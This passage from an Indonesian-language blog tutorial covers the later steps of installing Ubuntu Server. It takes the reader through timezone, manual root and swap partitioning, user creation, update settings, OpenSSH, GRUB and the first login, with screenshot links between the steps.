8.                                   Setelah konfigurasi Network selesai maka langkah berikutnya adalah menentukan timezone berdasarkan GMT, untuk anda yang tinggal di zona WIB maka pilihlah Jakarta
http://narzizz.files.wordpress.com/2011/03/selection_019.png?w=441&h=330
Setting Zona Waktu
9.                     Lakukan Partisi. Ini adalah langkah yang sangat penting, jika pada sistem anda sebelumnya sudah ada partisi yang berisi data. Jangan terjebak dengan menunya yang disebut guided atau dipandu karena jika anda memilih ini maka semua partisi akan dihapus dan installer akan menggunakan seluruh harddisk. Jadi berhati-hatilah di tahap ini. Pilih partisi secara manual.
http://narzizz.files.wordpress.com/2011/03/selection_020.png?w=441&h=330
Pilih Partisi secara manual
10.                  Jika harddisk yang digunakan belum digunakan sama sekali maka anda harus membuat tabel paritsi terlebih dahulu. Pada tutorial ini kita akan melakukan partisi minimum yang diperlukan yaitu hanya ada dua partisi saja untuk root(/) dan ruang swap
11.    Pilih Harddisk yang akan dipartisi dan buat tabel partisi kosong
http://narzizz.files.wordpress.com/2011/03/selection_021.png?w=441&h=330
Pilih harddisk yang akan dipartisiBuat tabel partisi kosong
12.    Pilih FREE SPACE dan buat partisi baru
http://narzizz.files.wordpress.com/2011/03/selection_023.png?w=441&h=332
Pilih ruang kosong untuk dibuat partisi
13.    tentukan besarnya partisi, tipe partisi
http://narzizz.files.wordpress.com/2011/03/selection_024.png?w=441&h=329
Pilih buat partisi baru

http://narzizz.files.wordpress.com/2011/03/selection_025.png?w=441&h=333
Tentukan besarnya partisi
http://narzizz.files.wordpress.com/2011/03/selection_026.png?w=441&h=331
Pilih tipe Partisi

http://narzizz.files.wordpress.com/2011/03/selection_027.png?w=433&h=169
Pilih lokasi Partisi
14.                  tentukan file system, mount point dan lain lain. dalam hal ini kita pilih untuk root saja dengan file system EXT4
http://narzizz.files.wordpress.com/2011/03/selection_028.png?w=436&h=279
tentukan file system dan mount pointnya
15.    buat juga partisi dengan file system swap area.
http://narzizz.files.wordpress.com/2011/03/selection_029.png?w=432&h=275
Memilih ruang kosong untuk swap

http://narzizz.files.wordpress.com/2011/03/selection_030.png?w=403&h=208
Pilihan membuat partisi baru untuk swap
http://narzizz.files.wordpress.com/2011/03/selection_031.png?w=609&h=277
Menentukan ukuran partisi untuk swap
http://narzizz.files.wordpress.com/2011/03/selection_032.png?w=349&h=362
memilih file sistem swap area untuk partisi swap
http://narzizz.files.wordpress.com/2011/03/selection_033.png?w=495&h=258
Pilih done jika setting sudah sesuai
16.    Jika sudah selesai pilih Finish
http://narzizz.files.wordpress.com/2011/03/selection_034.png?w=433&h=277
17.    Partitioning and write changes to disk
18.                  Maka akan muncul konfirmasi dari perubahan terhadap disk, jika anda sudah yakin pilih yes jika belum maka pilih no dan kembali ke langkah sebelumnya
http://narzizz.files.wordpress.com/2011/03/selection_035.png?w=419&h=215







19.                  http://narzizz.files.wordpress.com/2011/03/selection_036.png?w=300&h=69Berikutnya installer akan menulis perubahan pada harddisk dan akan melakukan instalasi base system




20.                  Jika base sistem sudah terpasang maka anda akan diminta membuat user baru dimana user ini adalah user yang akan memiliki root access melalui perintah sudo.
http://narzizz.files.wordpress.com/2011/03/selection_037.png?w=300&h=148
                                                  





http://narzizz.files.wordpress.com/2011/03/selection_039.png?w=300&h=117






http://narzizz.files.wordpress.com/2011/03/selection_040.png?w=300&h=106








21.    Jika sudah selesai maka akan ditanyakan apakah home directory akan diencrypt atau tidak.
http://narzizz.files.wordpress.com/2011/03/selection_041.png?w=300&h=125







22.                  Langkah berikutnya adalah bagaimana sistem yang dipasang akan diupdate, terdapat tiga pilihan yaitu No Automatic Updates, install security updates automatically, dan Landscape (mode banyak duit:= ON)
http://narzizz.files.wordpress.com/2011/03/selection_043.png?w=300&h=151








23.                  Pilih aplikasi server yang ingin anda pasang dari menu tasksel atau dapat memilih sendiri sesuai kebutuhan anda. disarankan untuk memasang OpenSSH Server untuk kebutuhan melakukan remote terhadap server kita in case jika tempat server yang kita buat ini bukan tempat yang akan sering kita datangi misalkan karena jaraknya jauh, suhu ruangannya yang tidak manusiawi, atau tempatnya horror mungkin saja.
http://narzizz.files.wordpress.com/2011/03/selection_045.png?w=300&h=182



24.                  Pilih install grub bootloader di MBR kecuali anda punya opsi lain (ini kan server, masa ada server multiboot OS? Kalo virtualisasi si bisa dimengerti)

http://narzizz.files.wordpress.com/2011/03/selection_047.png?w=300&h=142
Opsi instalasi GRUB boot loader
25.                  Instalasi selesai dan anda dapat merestart komputer anda dengan server yang sudah terinstall. Lepaskan media instalasi dari tempatnya agar tidak booting dari media
tersebut.

http://narzizz.files.wordpress.com/2011/03/selection_048.png?w=300&h=102
http://narzizz.files.wordpress.com/2011/03/selection_049.png?w=300&h=224
Layar login ubuntu server

Jika kamu sudah mencapai layar login dan sukses masuk ke sistem berarti instalasi dinyatakan berhasil
Sekian tutorial yang saya buat sebagai bahan pembelajaran.


Copyright © 2012 0phuz DarkSector Inspiron.